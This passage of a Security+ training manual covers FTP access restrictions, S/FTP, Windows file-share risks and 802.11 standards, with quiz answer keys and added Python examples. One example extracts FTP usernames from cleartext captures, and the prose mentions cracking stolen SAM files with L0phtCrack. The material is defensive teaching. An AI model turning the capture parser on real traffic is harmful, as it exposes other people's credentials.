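Added example (not part of the course). It assumes the capture has already
been reduced to one text line per TCP segment in the constructed form
'<src>:<port> -> <dst>:<port> <payload>'; no capture tool is invoked.
Observed passwords are never stored, only their length.
"""
import re
from dataclasses import dataclass

LINE_RE = re.compile(
    r"^(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) (?P<payload>.*)$"
)

# Constructed sample: a client (192.0.2.10) talking to an FTP server
# (192.0.2.20) on which anonymous access has just been disabled, as in
# activity B-2. Reply wording is illustrative, not copied from any product.
SAMPLE_CAPTURE = """\
192.0.2.20:21 -> 192.0.2.10:1040 220 FTP service ready.
192.0.2.10:1040 -> 192.0.2.20:21 USER anonymous
192.0.2.20:21 -> 192.0.2.10:1040 331 Password required for anonymous.
192.0.2.10:1040 -> 192.0.2.20:21 PASS password
192.0.2.20:21 -> 192.0.2.10:1040 530 User anonymous cannot log in.
192.0.2.10:1040 -> 192.0.2.20:21 USER user1
192.0.2.20:21 -> 192.0.2.10:1040 331 Password required for user1.
192.0.2.10:1040 -> 192.0.2.20:21 PASS S3cret!pass
192.0.2.20:21 -> 192.0.2.10:1040 230 User user1 logged in.
192.0.2.10:1040 -> 192.0.2.20:21 QUIT
192.0.2.20:21 -> 192.0.2.10:1040 221 Goodbye.
"""


@dataclass
class Finding:
    client: str
    server: str
    username: str
    password_length: int
    result: str          # "success" (230 reply) or "failure" (5xx reply)


def find_cleartext_logins(capture, control_port=21):
    """Return one Finding per USER/PASS pair that the server answered."""
    pending = {}         # (client, server) -> {"user": str, "pass_len": int | None}
    findings = []
    for raw in capture.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        src, dst, payload = m["src"], m["dst"], m["payload"]
        if int(m["dport"]) == control_port:          # client -> server command
            verb, _, arg = payload.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                pending[(src, dst)] = {"user": arg, "pass_len": None}
            elif verb == "PASS" and (src, dst) in pending:
                pending[(src, dst)]["pass_len"] = len(arg)
        elif int(m["sport"]) == control_port:        # server -> client reply
            key = (dst, src)
            state = pending.get(key)
            if state is None or state["pass_len"] is None:
                continue                              # no PASS sent yet
            code = payload[:3]
            if code == "230":
                result = "success"
            elif code.startswith("5"):
                result = "failure"
            else:
                continue                              # 331 and similar: keep waiting
            findings.append(Finding(key[0], key[1], state["user"], state["pass_len"], result))
            del pending[key]
    return findings


if __name__ == "__main__":
    for f in find_cleartext_logins(SAMPLE_CAPTURE):
        print(f"{f.client} -> {f.server}: user={f.username!r} "
              f"password_len={f.password_length} result={f.result}")
```

Both logins, the rejected anonymous one and the successful user1 one, are fully visible on the wire; disabling anonymous access changes who may log in, not what a sniffer can read.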

Do it!   B-2: Controlling access to the FTP site

Here’s how (with Here’s why indented under each step)

 1 Switch to the Computer Management window and right-click My FTP Site
      To deny anonymous access to your ftp site.

   Choose Properties

 2 Activate the Security Accounts tab

 3 Clear Allow anonymous connections
      You’ll receive the message shown below.

   Click Yes

 4 Click Apply

Instructor note: Make sure both partners have completed step 5 before they continue with
step 6. The remainder of the activity might not work correctly.

 5 Switch to the Command window and enter ftp

 6 At the ftp prompt, enter open <your partner’s IP address>

 7 Enter anonymous
      For the username.

 8 Enter password
      For the password.

      The login will fail because a valid account with a password is required.

      Anonymous access will no longer be allowed, but there is a risk of having the
      password sniffed on the network.

 9 At the ftp prompt, enter user
      To reattempt login.

   Enter user1
      For the username.

   Enter the password for the User 1 account
      You'll be connected.

10 Enter quit
      To end the ftp session.

                         The threat of password sniffing
Explanation              Removing anonymous access to an FTP site makes it vulnerable to password sniffing.
                         One way to counter this vulnerability is to restrict access to the site by IP address. A
                         user trying to access the site would have to provide a valid username and password, and
                         would have to access the site from the appropriate computer. This method can be very
                         effective in preventing someone on the outside from using a sniffer to obtain a username
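The following added example (not part of the course, and not an IIS API) models the TCP/IP access restriction described above as it appears on the Directory Security tab: either all computers are granted access by default except a list of exceptions, or all are denied by default except the exceptions. It also shows why, in activity B-3, a denied address fails even with a valid account: the address check runs before credentials are examined. The account store, reply strings and IP addresses are constructed for the demonstration.

```python
"""Model of IIS-style TCP/IP access restrictions for an FTP site.

Added example; it is not part of the course and calls no IIS API. It
mirrors the two choices on the Directory Security tab: all computers
granted access by default except the listed exceptions, or all denied by
default except the listed exceptions. An exception may be a single
address or a network given with a subnet mask or a prefix length.
"""
import ipaddress


class TcpIpRestrictions:
    def __init__(self, default="granted"):
        if default not in ("granted", "denied"):
            raise ValueError("default must be 'granted' or 'denied'")
        self.default_granted = default == "granted"
        self.exceptions = []          # networks that get the opposite of the default

    def add_exception(self, spec):
        # "192.0.2.10" becomes a /32; "192.0.2.0/255.255.255.0" or "/24" a subnet.
        self.exceptions.append(ipaddress.ip_network(spec, strict=False))

    def allows(self, client_ip):
        addr = ipaddress.ip_address(client_ip)
        listed = any(addr in net for net in self.exceptions)
        return self.default_granted != listed      # an exception flips the default


# Constructed credential store standing in for the server's local accounts.
ACCOUNTS = {"user1": "P@ssw0rd-example"}


def ftp_login(restrictions, client_ip, username, password):
    """Return an FTP-style reply (constructed wording). The address check runs
    before the credentials are looked at, so a denied address fails even
    when the account and password are valid."""
    if not restrictions.allows(client_ip):
        return "530 Access denied by TCP/IP access restriction."
    if ACCOUNTS.get(username) == password:
        return f"230 User {username} logged in."
    return "530 User cannot log in."


if __name__ == "__main__":
    # Activity B-3: grant everyone except the partner's address.
    r = TcpIpRestrictions("granted")
    r.add_exception("192.0.2.10")
    print(ftp_login(r, "192.0.2.10", "user1", "P@ssw0rd-example"))   # denied by address
    print(ftp_login(r, "192.0.2.11", "user1", "P@ssw0rd-example"))   # logged in
```

The "denied by default" form is the safer configuration for a site that only a known set of hosts should reach: anything not explicitly listed, including a host an attacker controls, never gets as far as the password prompt.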

Do it!   B-3: Configuring FTP TCP/IP restrictions

Here’s how (with Here’s why indented under each step)

 1 Switch to the Computer Management window

 2 Activate the Directory Security tab

 3 Click Add…

 4 Enter the IP address of your partner’s server

   Click OK

 5 Click Apply

Instructor note: Make sure both partners have completed step 5 before they continue with
step 6. The remainder of the activity might not work correctly.

 6 Switch to the Command window and at the ftp prompt, enter
   open <your partner’s IP address>

 7 At the ftp prompt, enter user1
      To reattempt login.

   Enter the password for the User 1 account
      You’ll be denied access because your IP address has been denied access.

 8 Enter quit
      (To end the session.)

 9 Close the Command window

10 When both you and your partner are finished testing the ftp connection, return to the
   Directory Security tab and remove your partner’s IP address

11 In Computer Management, stop the My FTP Site and restart the Default FTP Site
      Expand Services and Applications, expand Internet Information Services, and expand
      FTP Sites to stop/start the ftp sites.

12 What are the options available for TCP/IP Access Restrictions? (Choose all that apply.)
      A  Granted access
      B  Enable access
      C  Denied access
      D  Full access

13 If an IP address has been denied access to an FTP server:
      A  Users can logon using the administrator password
      B  Users can logon using their password
      C  Users can logon using an Anonymous account
      D  Users will not be able to access the server

14 All IP addresses are granted access by default. True or false?
      True

15 Close Computer Management

                     Secure file transfers
Explanation          Several attempts have been made to address FTP’s security shortcomings. RFC 2228,
                     FTP Security Extensions, was released in 1997 to address the issue of FTP’s clear text
                     authentication, but it has not been widely adopted. Several proprietary Secure FTP
                     products have also been released by various vendors, offering secure authentication (and
                     in some cases secure data transfer), but they have been given a lukewarm reception in the
                     marketplace. Other strategies to secure FTP have involved conducting file transfers
                     through an encrypted tunnel via an SSL or IPSec VPN.

                     S/FTP
                     The most commonly used Secure File Transfer Protocol (S/FTP) is not a rehash of
                     traditional FTP at all, but is a new component of the Secure Shell (SSH) protocol
                     introduced with SSH version 2 (SSH2). The OpenSSH man page offers the following
                     description of S/FTP:
                        S/FTP is an interactive file transfer program, similar to ftp, which performs all
                        operations over an encrypted ssh transport. It might also use many features of ssh,
                        such as public key authentication and compression. S/FTP connects and logs into the
                        specified host, then enters an interactive command mode.
                     The key words in this quote are “similar to ftp.” Because of the protocol’s name,
                     “Secure FTP,” one might expect that S/FTP is a method of securing traditional FTP, but
                     it is not. The only relationship between S/FTP and traditional FTP is that S/FTP
                     employs the older variant’s command syntax. Rather than a protocol, S/FTP is an FTP-
                     like program provided as part of the SSH suite to securely transfer files. S/FTP does not
                     provide any new network protocols; it only provides an FTP-like user interface to use
                     the existing SSH2 encryption mechanisms to transfer files.
                     Note that SSH’s Secure File Transfer Protocol (S/FTP) should not be confused with
                     the Simple File Transfer Protocol (SFTP) defined in RFC 913. The latter is easier to
                     implement than the original FTP, and the former is not a protocol at all, but a program
                     that leverages SSH to securely transfer files between hosts.
                     Secure Shell’s S/FTP standard has a number of benefits over traditional FTP:
                         • S/FTP uses the underlying SSH2 protocol, so it offers strong authentication
                           using a variety of methods, including X.509 certificates.
                         • Because it uses SSH2, S/FTP encrypts authentication, commands, and all data
                           transferred between the client and the server using secure encryption algorithms.
                         • Because SSH2 uses a single, well-behaved TCP connection (as compared to active
                           FTP, which opens a reverse connection, and passive FTP, which opens a connection
                           on a random high port), it is easy to configure a firewall to permit S/FTP
                           communications. S/FTP uses the same TCP port as SSH2, port 22.
                         • Because traditional FTP clients and servers negotiate the IP address and port for
                           opening the data connection, it’s difficult to use Network Address Translation
                           (NAT) on FTP connections. S/FTP avoids this issue altogether because no
                           negotiation is required to open a second connection.

The following table lists Secure FTP implementation programs:

 Program      Note

 SSH          The SSH product produced by the company of the same name, offering both
              server and client software.
              http://ssh.com/support/downloads/

 OpenSSH      An open source version of SSH.
              http://sshwindows.sourceforge.net/

 PuTTY        A freeware SSH client implementation for Windows operating systems.
              www.chiark.greenend.org.uk/~sgtatham/putty/

Do it!   B-4: Understanding file transfer services

Questions and answers

 1 Provide the TCP port numbers for the following FTP sessions:

      Active FTP source port             20
      Active FTP destination port        >1023
      Passive FTP source port            >1023
      Passive FTP destination port       >1023
      FTP command source port            >1023
      FTP command destination port       21

 2 FTP traffic is sent unencrypted in clear text. True or false?
      True

 3 With blind FTP sites, a user logs on as anonymous, but is then restricted to a
   single directory and is not able to obtain a listing of files in the directory. True or
   false?
      True

 4 In passive FTP, the server initiates the data connection to the client. True or false?
      False

 5 The terms “active” and “passive” in FTP refer to the client’s role in setting up the
   data connection. True or false?
      False: It refers to the server’s role.

 6 Secure File Transfer Protocol (S/FTP) is an extension of FTP. True or false?
      False: It is a new component of the Secure Shell protocol.

 7 Audits for file shares should be conducted in complete secrecy. True or false?
      False: Audits should be conducted with management approval, including any required
      change management sign-offs, and should be carefully documented.


Topic C: File sharing
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               2.5   Recognize and understand the administration of the following file transfer
                     protocols and concepts
                       • File Sharing
                       • Vulnerabilities
                           • Packet Sniffing




              File shares
Explanation   A common way of sharing files is using file shares on a Microsoft Windows network.
              This method was originally intended to share files on a local area network (LAN) rather
              than across the Internet as FTP is used, although current versions of Windows allow
              mapping via IP connections. File shares are popular because they are easy to set up, and
              they use the Windows graphical interface. Very little computer knowledge is required
              for people to share files across the network using file shares; one simply views the file’s
              or folder's properties and selects the appropriate check box, as shown in Exhibit 7-5.




              Exhibit 7-5: File sharing in Windows Server 2003

              Shared files can be configured as peer-to-peer (so that multiple desktop computers can
              access files on another desktop computer) or as client/server shares (set up to provide
              users with centralized network storage on a server).

                  Vulnerabilities
                  Although file shares seem both harmless and indispensable, there are indeed several
                  risks that security administrators need to manage carefully.
                  First, there is a risk to the confidentiality of data. Because most users control file
                  sharing on their own desktop computers, they can open shares on their machines that
                  could accidentally become liabilities. Take, for example, an accountant who shares his
                  My Documents folder to let his coworkers access his collection of MP3 music files. If
                  the accountant accidentally saves a spreadsheet containing the salaries of all employees
                  into the same folder, he could inadvertently give confidential information to people who
                  should not have access to it.
                  Second, there are viruses that spread via network shares. If many users on the network
                  have unmonitored and uncontrolled network shares, they can cause malware such as the
                  Funlove virus to spread rapidly, damaging files and causing huge losses to productivity
                  as administrators battle the infection and workers are unable to perform their functions
                  because their programs no longer work.
                  Finally, other types of critical information besides user documents could become
                  compromised if file shares are misconfigured. One example of this is the C: drive on
                  Windows machines. If the entire drive were accidentally shared, an attacker would have
                  the ability to access important files in the C:\Windows directory. In this case, an attacker
                  could launch a denial-of-service attack on the machine by deleting critical files, or could
                  download the SAM file that contains the username and password of everyone who has
                  ever logged onto the machine. After downloading the SAM file, an attacker can crack it
                  using tools such as L0phtCrack.

                  Protecting your file shares
                  To protect your network from the risks posed by unauthorized file shares, your
                  organization needs to define a policy regarding the use of file shares. After the policy
                  has been defined and communicated to all users as part of a security awareness program,
                  security administrators can take action to ensure the policy is respected by conducting
                  audits of file shares. Audits should be conducted with management approval, including
                  any required change management sign-offs, and should be carefully documented. Most
                  commercial scanning and audit tools can identify file shares.
                  Freeware scanners for file shares include:
                      • Legion — http://packetstormsecurity.org/groups/rhino9
                      • SMBScanner — http://home.ubalt.edu/abento/753/enumeration/enumerationtools.html
                  For more details on how to use these tools and auditing best practices, see Jaime
                  Carpenter’s article entitled “Open File Shares: An Unexpected Business Risk” at the
                  SANS Reading Room (www.sans.org/rr/).
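An audit of your own machines does not have to wait for a scanner: each Windows host can list its shares with `net share`, and that listing can be checked against the three problems described above. The following added example (not part of the course, and not one of the tools it names) parses a constructed `net share` listing using the header's column positions, then flags shares of an entire drive, shares rooted in a user profile folder such as My Documents, and shares on which the Everyone group has Change or Full access (the setting the independent practice activity at the end of this unit turns on). Because the listing does not show permissions, they are supplied as a constructed mapping; all paths and share names are made up.

```python
"""Audit a Windows share listing for the misconfigurations described above.

Added example, not part of the course. It parses the columnar listing that
'net share' prints (the sample below is constructed, with made-up paths)
and checks each share against three conditions from the text: an entire
drive shared, a share rooted in a user profile folder, and the Everyone
group given Change or Full access. Share permissions are not in the
listing, so they are supplied as a constructed mapping.
"""
import re
from dataclasses import dataclass

SAMPLE_NET_SHARE = r"""
Share name   Resource                        Remark

-------------------------------------------------------------------------------
ADMIN$       C:\WINDOWS                      Remote Admin
C$           C:\                             Default share
IPC$                                         Remote IPC
Data         D:\                             Team drive
Dangerous    C:\Documents and Settings\jdoe\My Documents\Dangerous
MP3          C:\Documents and Settings\jdoe\My Documents   Music
The command completed successfully.
"""

# Constructed: share -> {account: permission}, as 'net share <name>' would show.
SAMPLE_PERMISSIONS = {
    "Data": {"DOMAIN\\Domain Users": "READ"},
    "Dangerous": {"Everyone": "CHANGE"},
    "MP3": {"Everyone": "READ"},
}

DRIVE_ROOT_RE = re.compile(r"^[A-Za-z]:\\?$")
PROFILE_DIR_RE = re.compile(r"\\(Documents and Settings|Users)\\", re.IGNORECASE)


@dataclass
class Share:
    name: str
    path: str
    remark: str


def parse_net_share(output):
    """Parse 'net share' output using the header line's column positions."""
    lines = [ln.rstrip() for ln in output.splitlines() if ln.strip()]
    header = next(ln for ln in lines if ln.startswith("Share name"))
    col_res, col_rem = header.index("Resource"), header.index("Remark")
    shares = []
    for ln in lines[lines.index(header) + 1:]:
        if ln.startswith("-") or ln.startswith("The command"):
            continue
        name = ln[:col_res].strip()
        if not ln[col_res:col_rem].strip():             # no path at all (IPC$)
            path, remark = "", ln[col_rem:].strip()
        else:
            # A long path overruns the Remark column; fields are separated by
            # runs of two or more spaces, which a path itself does not contain.
            parts = re.split(r"\s{2,}", ln[col_res:].strip(), maxsplit=1)
            path, remark = parts[0], (parts[1] if len(parts) > 1 else "")
        shares.append(Share(name, path, remark))
    return shares


def audit_shares(shares, permissions):
    """Return (share name, issue) pairs; administrative shares are skipped."""
    issues = []
    for s in shares:
        if s.name.endswith("$"):                         # ADMIN$, C$, IPC$ ...
            continue
        if DRIVE_ROOT_RE.match(s.path):
            issues.append((s.name, "drive-root"))
        if PROFILE_DIR_RE.search(s.path):
            issues.append((s.name, "profile-folder"))
        for account, perm in permissions.get(s.name, {}).items():
            if account.lower() == "everyone" and perm.upper() in ("CHANGE", "FULL"):
                issues.append((s.name, "everyone-writable"))
    return issues


if __name__ == "__main__":
    for name, issue in audit_shares(parse_net_share(SAMPLE_NET_SHARE), SAMPLE_PERMISSIONS):
        print(f"{name}: {issue}")
```

Administrative shares such as C$ are skipped here because they are present by default and restricted to administrators; a user-created share of D:\ is a different matter, which is why the Data share is reported. Findings of this kind are the evidence an audit should record before the share is removed or its permissions tightened.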

Do it!   C-1: Understanding file sharing

Questions and answers

 1 Which of the following features is true of file sharing?
      A  Can share files on a LAN
      B  Can share files over an IP connection
      C  Can be configured as peer-to-peer
      D  Can be configured as client/server

 2 What are some of the risks associated with file sharing?
      A  Sharing confidential data
      B  Spreading viruses
      C  Compromising system files
      D  All of the above

 3 What are some recommendations for protecting file shares?
      • Define a policy and communicate it to all users
      • Conduct audits of file shares


Unit summary: Directory and file transfer services
Topic A              In this topic, you learned that LDAP eliminates the necessity to authenticate at multiple
                     servers in order to access different applications and network resources. Using X.500
                     directory services, LDAP simplifies both the logon process and administration of all
                     network resources.
Topic B              In this topic, you learned that ftp is a file transfer mechanism commonly used on the
                     Internet. You learned that ftp is not a secure protocol and that S/FTP, which is based on
                     SSH version 2, is the recommended solution.
Topic C              In this topic, you learned that uncontrolled file shares on Windows networks could be a
                     potential weak spot in many networks. File shares should be centrally administered on
                     file servers, and periodic audits should be conducted to identify and remove
                     unauthorized file shares.

                     Review questions
                       1 Information about network resources is stored as a(n) __________ in the directory
                         services database.
                         object

                       2 A commonly used directory service protocol that was developed by the IETF is
                         __________.
                         LDAP

                       3 The Microsoft implementation of directory services is called
                         ________________________.
                         Active Directory

                       4 PKI, user administration, and single sign-on are some of the applications of LDAP.
                         True or False?
                         True

                       5 List the elements in the X.500 hierarchical structure from the top to the bottom.
                         Root, country, organization, organizational unit, leaf objects

                       6 Distinguished names do not need to be unique. True or False?
                         False

                       7 LDAP provides authentication and authorization services. It also provides
                         encryption by utilizing other protocols. True or False?
                         True

                       8 List the security vulnerabilities you need to protect your LDAP service from.
                         DoS, man-in-the-middle, and attacks against data confidentiality

                       9 List the steps you can take to secure the LDAP server from the vulnerabilities that
                         can affect it.
                         Apply the latest OS and application security patches, remove unneeded services and
                         applications, configure strong authentication, block LDAP at the firewall.

                      10 FTP is one of the most secure services on the Internet. True or False?
                         False

                      11 Which TCP port is used to initiate an FTP session?
                         Port 21

                      12 Compare active FTP and passive FTP.
                         In active FTP, which is FTP’s default operation, the FTP server creates a data connection by
                         opening a TCP session using a source port of 20 and a destination port greater than 1023. In
                         passive FTP, which is not supported by all FTP implementations, the client initiates the data
                         connection to the server (therefore, the server is said to be passive because it’s only accepting a
                         connection instead of originating one).

                      13 List some of the FTP security issues you should guard against.
                         Bounce attacks, clear text authentication and data transmission, glob vulnerabilities, software
                         exploits and buffer overflow vulnerabilities, anonymous FTP and blind FTP access.

                      14 The default settings for an FTP site is to require usernames and passwords. True or
                         False?
                         False: The default is anonymous access.

                      15 How can you prevent password sniffing when users are connecting to an FTP
                         server?
                         Restrict access to the site by IP address. A user trying to access the site would have to provide a
                         valid username and password, and would have to access the site from the appropriate computer.

                      16 List the vulnerabilities of using Windows file shares.
                         Risk to confidentiality of data, viruses spreading via network shares, and other types of critical
                         information besides user documents could become compromised if file shares are misconfigured.

                      17 File shares are peer-to-peer only. True or false?
                         False: They can also be client/server shares.

                      18 List some ways you can protect file shares.
                         Establish a policy and communicate it to users. Audit the network to ensure that the policy is
                         being followed.

                      19 List some methods of securing FTP file transfers.
                         Using Secure FTP products, conduct file transfers through an encrypted tunnel via SSL or IPSec
                         VPN.

                      20 S/FTP is simply a re-write of the FTP service. True or False?
                         False: It is a component of the SSH protocol.

                  Independent practice activity
                  In this activity, you’ll configure a file share on a Windows network:
                    1 Open My Documents in Windows.
                    2 Right-click in the right pane and choose New, Folder.
                    3 Rename the new folder to Dangerous.
                    4 Right-click the Dangerous folder, and choose Properties.
                    5 Activate the Sharing tab.
                    6 Select Share this folder.
                    7 Click OK.
                    8 Create a new text document, and save it to the Dangerous folder.
                    9 On another computer in the network, browse to Dangerous through My Network
                      Places.
                  10 Open the text file and modify it.
                  11 Were you able to open the file? Were you able to save the file? Why or why not?
                      You should have been able to open the file, but you shouldn’t have been able to save the file.
                      Default permissions on the folder only allow the group Everyone to Read the file.

                  12 On your computer, display properties for the Dangerous folder. Change the
                     permissions for the group Everyone to allow Change. (Activate the Sharing tab,
                     click Permissions…, check Change in the Allow column.)
                  13 On the other computer, try saving the file again.
                  14 Were you able to save it now?
                      Yes

                  15 On the first computer, check the text file for modifications.
                  Next, you’ll scan your own computer for file shares using Legion. This file can be
                  found under packetstormsecurity.nl/groups/rhino9/.
                  16 Download the file legionv21.zip according to your instructor's directions.
                  17 Unzip the file to C:\Security.
                  18 Run the Setup program Setup.exe.
                  19 Click Next at the Welcome screen.
                  20 Click Next at each screen to accept the defaults. Click Finish to exit the
                     installation program.
                  21 Click Start, then choose All Programs, Legion to run the program.
                  22 Enter the starting IP address in the Scan from text boxes.
                  23 Click Scan.
                  24 What file shares were detected on your computer?
                      Dangerous should appear in the share list.

                  25 Close Legion.


Unit 8
Wireless and instant messaging
                        Unit time: 90 minutes

                        Complete this unit, and you’ll know how to:

                        A Discuss 802.11 standards.

                        B Describe the Wireless Application Protocol
                           (WAP) and explain how it works.

                        C Describe Wired Equivalent Privacy (WEP).

                        D Discuss instant messaging.


Topic A: IEEE 802.11
                     This topic covers the following CompTIA Security+ exam objective:

                      #       Objective

                      2.6     Recognize and understand the administration of the following wireless
                              technologies and concepts
                                • 802.11 and 802.11x




                     IEEE 802 LMSC
Explanation          In 1980, the Institute of Electrical and Electronics Engineers (IEEE) created the 802
                     LAN/MAN Standards Committee (LMSC). This committee was tasked to create
                     standards of operability related to local area networks (LANs) and metropolitan area
                     networks (MANs). In 1990, the committee formed the 802.11 working group to define
                     the interface between wireless clients and their network access points.
                     The 802.11 working group finalized its first standard in 1997. IEEE 802.11 defines
                     three types of transmission at the Physical (PHY) layer:
                            • Diffused infrared, based on infrared transmissions
                            • Direct sequence spread spectrum (DSSS), based on radio transmissions
                            • Frequency hopping spread spectrum (FHSS), also based on radio transmissions
                     WEP was established as an optional security protocol.
                     The group also specified the use of the 2.4 GHz industrial, scientific and medical (ISM)
                     radio band because it was the only band that was available and unlicensed in most
                     countries of the world. Within this band, the group limited its work to the Physical layer
                     and the Media Access Control (MAC) sublayer of the Data Link layer, leaving the Logical
                     Link Control (LLC) sublayer and higher layers of the OSI model to existing standards.
                     The group also mandated a 1 Mbps data transfer rate and an optional 2 Mbps data
                     transfer rate.
                     As the 802.11 project developed, the members of the working group found it necessary
                     to add additional working groups to more efficiently tackle their task. As these
                     subgroups were added, each was designated with a letter, starting with “a” and going
                     through “j.” The four most prominent of these groups have been 802.11b, 802.11a,
                     802.11i, and 802.11g.
                     Some of these working groups have already approved new standards, others are still
                     working, and two others, 802.11c and 802.11j, have been respectively folded into
                     another working group or disbanded. Two other 802 working groups, 802.15 (covering
                     wireless personal area networks or Wireless PANs) and 802.16 (covering wireless
                     metropolitan area networks or Wireless MANs), are also working on wireless standards.
                     These standards are only briefly mentioned since they are not covered on the exam.
                                                Wireless and instant messaging       8–3

802.11a
The IEEE approved the 802.11a standard in 1999 and titled it “High-speed Physical
Layer in the 5 GHz Band.” This standard specifies an additional type of data
transmission at the Physical layer, Coded Orthogonal Frequency Division Multiplexing
(COFDM).
The COFDM layer provides data transmission rates of 6, 9, 12, 18, 24, 36, 48, and 54
Mbps—a major improvement over the 5.5 Mbps or 11 Mbps offered by 802.11b. The
radios consist of either wireless NIC cards or wireless access points (APs), and they
operate by converting the digital and analog signals between the client and the wired
network. Communications are established at the fastest possible data rate, which is
dependent upon the distance between the client and network and the strength of the
signal.
One major benefit of operating in the 5 GHz band is that 802.11a devices do not have to
compete with many other devices, such as cordless phones, microwave ovens, and baby
monitors (though baby monitors are usually not a problem in a corporate environment).

802.11b
The 802.11b standard was approved in 1999, concurrently with 802.11a. The IEEE
named the 802.11b standard the “Higher-Speed Physical Layer Extension in the 2.4 GHz
Band.” It established specifications for an additional type of data transmission at
the Physical layer, High-Rate Direct Sequence Spread Spectrum (HR/DSSS). This allows
for data transmission at either 5.5 Mbps or 11 Mbps (as fast as 10 Mbps Ethernet and
much faster than most Internet connections of the time) instead of the mandatory
1 Mbps or the optional 2 Mbps rate offered by the original 802.11 standard. In 2001,
the 802.11b standard came under heavy criticism because of security flaws in WEP;
those flaws apply to every 802.11 variant that uses WEP, not to 802.11b alone.
The Wireless Ethernet Compatibility Alliance (WECA), an equipment testing and
certification group (now the Wi-Fi Alliance), created an interoperability certification
for 802.11b equipment dubbed “Wi-Fi,” a trademark that is commonly, though
unofficially, expanded as “wireless fidelity.”

802.11c
The IEEE working group C was responsible for creating 802.11c, which would develop
MAC bridging functionality. This group was folded into the 802.1D standard.
802.1D is focused on MAC bridging in wired LANs and should not be confused with
802.11d.

802.11d
The IEEE working group D determined the requirements necessary for 802.11 to operate
under the regulatory rules of countries other than the United States and incorporated
those requirements into 802.11d, which was approved in 2001.
8–4   CompTIA Security+ Certification

                 802.11e
                 The IEEE working group E created the 802.11e standard, which adds multimedia and
                 Quality of Service (QoS) capabilities to the MAC layer so that specified data
                 transmission rates and error percentages can be guaranteed. The standard was approved
                 in 2005 and benefits 802.11a, 802.11b, and 802.11g alike. It also affects 802.15,
                 which is assigned the task of creating wireless personal area network (Wireless PAN)
                 standards, and 802.16, which is assigned the task of creating Wireless MAN standards.
                 Without an improvement in QoS, many of the benefits of higher data transmission
                 rates, such as video streaming and wireless Voice over IP (wireless VoIP), would not
                 materialize.

                 802.11f
                 The IEEE working group F created the 802.11f recommended practice (the Inter-Access
                 Point Protocol), approved in 2003, which allows for better roaming between
                 multivendor access points across a distribution system (the wired backbone that
                 connects the access points) than the original 802.11 made feasible.

                 802.11g
                 The IEEE working group G created the 802.11g standard, which was approved in June
                 2003. This standard offers a raw data rate of up to 54 Mbps in the 2.4 GHz band,
                 roughly five times that of 802.11b. The 802.11g specification is backward compatible
                 with the widely deployed 802.11b standard.

                 802.11h
                 The IEEE working group H created 802.11h, which adds what European regulators
                 require of 5 GHz Physical layer implementations. Two requirements of this standard
                 are transmit power control, which keeps a radio from emitting more signal than is
                 needed, and dynamic frequency selection, which makes a device listen to radio
                 activity before picking a channel on which to broadcast so that it does not interfere
                 with radar systems that share the band. This standard was approved in 2003.

                 802.11i
                 The IEEE working group I was responsible for fixing the serious security flaws in
                 WLANs by developing new security standards. The 802.11i standard was approved in
                 2004. Its medium-term goal was a fix that stayed at least somewhat backward
                 compatible with existing WEP hardware, so that a wholesale replacement of deployed
                 equipment would not be necessary: the Temporal Key Integrity Protocol (TKIP). TKIP
                 keeps the RC4 cipher that WEP hardware already implements but uses 128-bit temporal
                 keys, mixes a fresh key for every packet (fast packet keying), adds a message
                 integrity check, and requires that keys be replaced within a set interval. As
                 discussed in the WEP section of this unit, WEP does not require that keys ever be
                 replaced. The Wi-Fi Alliance shipped this interim subset of 802.11i as WPA before
                 the standard was final.
                 In the long term, the working group intended to eliminate WEP and TKIP altogether in
                 favor of CCMP, an AES-based protocol that requires new hardware. The full 802.11i
                 standard, with CCMP mandatory, is what the Wi-Fi Alliance certifies as WPA2.

802.11j
The IEEE working group J "Wireless LAN Medium Access Control (MAC) and
Physical Layer (PHY) Specifications: 4.9 to 5 GHz Operation in Japan" addresses
Japanese government regulations regarding the use of Wireless LANs in the 4.9 and 5
GHz bands in indoor hot spot, fixed outdoor, and nomadic or mobile modes. This was
approved in November 2004.
A summary of IEEE 802.11 working groups is provided in the following table:

 Working group       Primary task                                           Status of work

 802.11a             Established specifications for wireless data           Approved 1999
                     transmission in the 5 GHz band

 802.11b             Established specifications for wireless data           Approved 1999
                     transmission in the 2.4 GHz band

 802.11c             Wireless MAC bridging functionality                    Folded into 802.1D

 802.11d             Requirements that allow 802.11 to operate              Approved 2001
                     outside the United States

 802.11e             Multimedia and Quality of Service (QoS)                Approved 2005
                     capabilities for the wireless MAC layer

 802.11f             Roaming between multivendor access points              Approved 2003
                     across a distribution system

 802.11g             Raw data rate of up to 54 Mbps in the                  Approved 2003
                     2.4 GHz band

 802.11h             European regulatory requirements for the              Approved 2003
                     5 GHz band (transmit power control, dynamic
                     frequency selection)

 802.11i             Security fixes for WLANs (TKIP, CCMP, key              Approved 2004
                     management)

 802.11j             Japanese regulatory requirements for 4.9 to           Approved 2004
                     5 GHz band use


The IEEE is dealing with all of the technology issues that arise as it tries to set standards
for wireless data transmission and processing. At some point, all of these groups will
have completed their work, and other challenges will arise that need to be dealt with as
time goes on.

Do it!              A-1:      Discussing IEEE 802.11 protocol
                      Questions and answers
                       1 The IEEE work groups were named in sequential alphabetical order from which
                         of the following? (Choose all that apply.)
                          A    a through f
                          B    a through i
                          C    a through j
                          D    a through m

                       2 Which of the following are physical layers as defined by 802.11 protocols?
                          A    DSSS
                          B    COFDM
                          C    FHSS
                          D    Diffused infrared
                          E    MAC

                       3 Which of the following data transmission rates does 802.11b support? (Choose all
                         that apply.)
                          A    1 Mbps
                          B    5.5 Mbps
                          C    10 Mbps
                          D    11 Mbps
                          E    54 Mbps

                       4 The 802.11g protocol will offer throughput rates of up to _______.
                          A    10 Mbps
                          B    22 Mbps
                          C    54 Mbps
                          D    128 Mbps

                       5 Which of the following working groups is responsible for fixing the security flaws
                         in WLANs?
                          A    802.11j
                          B    802.11i
                          C    WAP Forum
                          D    802.1x
                          E    802.11g

Do it!                         A-2:   Creating a wireless network (demonstration only)

Instructor note: Introduce this activity as a demonstration. Students should observe
only. Use the Instructor’s PC to demonstrate the installation procedure.

                                Here’s how                             Here’s why

 1 Connect the Category 5 Ethernet network cable to the Linksys WAP11 Access Point
      The first step in creating a wireless network is to install and configure the
      router or wireless access point (WAP). In this activity, you’ll use a Linksys
      WAP11 Wireless Access Point to connect wireless devices. The Linksys WAP11 is
      initially installed from CD and can then be configured through a browser.

 2 Connect the other end of the cable to the classroom switch or hub
